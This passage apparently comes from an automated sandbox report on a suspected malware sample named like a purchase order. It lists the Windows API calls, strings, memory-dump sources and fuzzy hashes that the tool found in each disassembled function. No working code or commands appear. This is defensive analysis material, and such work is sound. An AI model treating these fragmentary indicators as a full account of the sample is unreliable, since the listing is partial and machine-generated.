                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                APIs
                • GetDesktopWindow.USER32 ref: 00472BB2
                • GetDC.USER32(00000000), ref: 00472BBB
                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                 • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CapsDesktopDeviceReleaseWindow
                • String ID:
                • API String ID: 2889604237-0
                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                APIs
                • __getptd_noexit.LIBCMT ref: 00415150
                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                • __freeptd.LIBCMT ref: 0041516B
                • ExitThread.KERNEL32 ref: 00415173
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                • String ID:
                • API String ID: 1454798553-0
                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _strncmp
                • String ID: Q\E
                • API String ID: 909875538-2189900498
                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                APIs
                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                • String ID: AutoIt3GUI$Container
                • API String ID: 2652923123-3941886329
                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove_strncmp
                • String ID: U$\
                • API String ID: 2666721431-100911408
                • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • __wcsnicmp.LIBCMT ref: 00467288
                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                • String ID: LPT
                • API String ID: 3035604524-1350329615
                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \$h
                • API String ID: 4104443479-677774858
                • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memcmp
                • String ID: &
                • API String ID: 2931989736-1010288
                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                APIs
                • _wcslen.LIBCMT ref: 00466825
                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CrackInternet_wcslen
                • String ID: |
                • API String ID: 596671847-2343686810
                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                APIs
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: '
                • API String ID: 3850602802-1997036262
                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                APIs
                • _strlen.LIBCMT ref: 0040F858
                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                • _sprintf.LIBCMT ref: 0040F9AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$_sprintf_strlen
                • String ID: %02X
                • API String ID: 1921645428-436463671
                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                APIs
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: Combobox
                • API String ID: 3850602802-2096851135
                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                APIs
                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: LengthMessageSendTextWindow
                • String ID: edit
                • API String ID: 2978978980-2167791130
                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                APIs
                • Sleep.KERNEL32(00000000), ref: 00476CB0
                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: GlobalMemorySleepStatus
                • String ID: @
                • API String ID: 2783356886-2766056989
                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: htonsinet_addr
                • String ID: 255.255.255.255
                • API String ID: 3832099526-2422070025
                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                APIs
                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                Strings
                Similarity
                • API ID: InternetOpen
                • String ID: <local>
                • API String ID: 2038078732-4266983199
                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                APIs
                Strings
                Similarity
                • API ID: __fread_nolock_memmove
                • String ID: EA06
                • API String ID: 1988441806-3962188686
                • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                APIs
                Strings
                Similarity
                • API ID: _memmove
                • String ID: u,D
                • API String ID: 4104443479-3858472334
                • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                APIs
                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • wsprintfW.USER32 ref: 0045612A
                Strings
                Similarity
                • API ID: MessageSend_mallocwsprintf
                • String ID: %d/%02d/%02d
                • API String ID: 1262938277-328681919
                • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                APIs
                • InternetCloseHandle.WININET(?), ref: 00442663
                • InternetCloseHandle.WININET ref: 00442668
